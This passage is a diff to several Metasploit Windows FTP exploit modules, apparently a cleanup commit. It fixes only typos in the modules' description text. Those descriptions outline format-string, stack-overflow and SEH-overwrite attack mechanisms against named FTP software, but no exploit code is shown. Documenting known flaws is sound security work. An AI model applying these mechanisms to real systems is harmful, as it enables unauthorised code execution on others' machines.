      'Name'          => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
      'Description'   => %q{
          This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
-        crafted format string specifier as a username. The crafted username is sent to to the server to
+        crafted format string specifier as a username. The crafted username is sent to the server to
        overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
        is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
        The SEH exit function is preferred so that the administrators are not left with an unhandled
--- a/modules/exploits/windows/ftp/freeftpd_pass.rb
+++ b/modules/exploits/windows/ftp/freeftpd_pass.rb
@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
        PASS command. This may allow a remote attacker to cause a buffer overflow,
        resulting in a denial of service or allow the execution of arbitrary code.
-        FreeFTPd must have an account set to authorization anonymous user account.
+        freeFTPd must have an account set to authorization anonymous user account.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
--- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb
+++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb
@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'FTPShell 5.1 Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets
-        triggered when the ftp clients tries to process an overly response to a PWD command.
+        triggered when the ftp client tries to process an overly long response to a PWD
-        This will overwrite the saved EIP and structured exception handler.
+        command. This will overwrite the saved EIP and structured exception handler.
      },
      'Author' 	 =>
        [
--- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb
+++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'HTTPDX tolog() Function Format String Vulnerability',
      'Description'    => %q{
          This module exploits a format string vulnerability in HTTPDX FTP server.
-        By sending an specially crafted FTP command containing format specifiers, an
+        By sending a specially crafted FTP command containing format specifiers, an
        attacker can corrupt memory and execute arbitrary code.
        By default logging is off for HTTP, but enabled for the 'moderator' user
--- a/modules/exploits/windows/ftp/pcman_put.rb
+++ b/modules/exploits/windows/ftp/pcman_put.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in the PUT command of the
          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
-          credientials are enabled.
+          credentials are enabled.
      },
      'Author'         =>
          [
--- a/modules/exploits/windows/ftp/scriptftp_list.rb
+++ b/modules/exploits/windows/ftp/scriptftp_list.rb
@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
        vulnerability that is triggered when processing a sufficiently long
        filename during a FTP LIST command resulting in overwriting the
        exception handler. Social engineering of executing a specially crafted
-        ftp file by double click will result in connecting to our malcious
+        ftp file by double click will result in connecting to our malicious
        server and perform arbitrary code execution which allows the attacker to
        gain the same rights as the user running ScriptFTP. This vulnerability
        affects versions 3.3 and earlier.
--- a/modules/exploits/windows/ftp/seagull_list_reply.rb
+++ b/modules/exploits/windows/ftp/seagull_list_reply.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the Seagull FTP client that gets
-        triggered when the ftp clients processes a response to a LIST command. If the
+        triggered when the ftp client processes a response to a LIST command. If the
        response contains an overly long file/folder name, a buffer overflow occurs,
        overwriting a structured exception handler.
      },
--- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb
+++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Name'           => 'Vermillion FTP Daemon PORT Command Memory Corruption',
      'Description'    => %q{
          This module exploits an out-of-bounds array access in the Arcane Software
-        Vermillion FTP server. By sending an specially crafted FTP PORT command,
+        Vermillion FTP server. By sending a specially crafted FTP PORT command,
        an attacker can corrupt stack memory and execute arbitrary code.
        This particular issue is caused by processing data bound by attacker
@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
        Processing is done using a source ptr (p) and a destination pointer (q).
        The vulnerable function walks the input string and continues while the
        source byte is non-null. If a comma is encountered, the function increments
-        the the destination pointer. If an ascii digit [0-9] is encountered, the
+        the destination pointer. If an ascii digit [0-9] is encountered, the
        following occurs:
          *q = (*q * 10) + (*p - '0');
--- a/modules/exploits/windows/ftp/xlink_client.rb
+++ b/modules/exploits/windows/ftp/xlink_client.rb
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Description'    => %q{
          This module exploits a stack buffer overflow in Xlink FTP Client 32
        Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.
-        When a overly long FTP server response is recieved by a client,
+        When an overly long FTP server response is received by a client,
        arbitrary code may be executed.
      },
      'Author' 	 => [ 'MC' ],
--- a/Show More
+++ b/Show More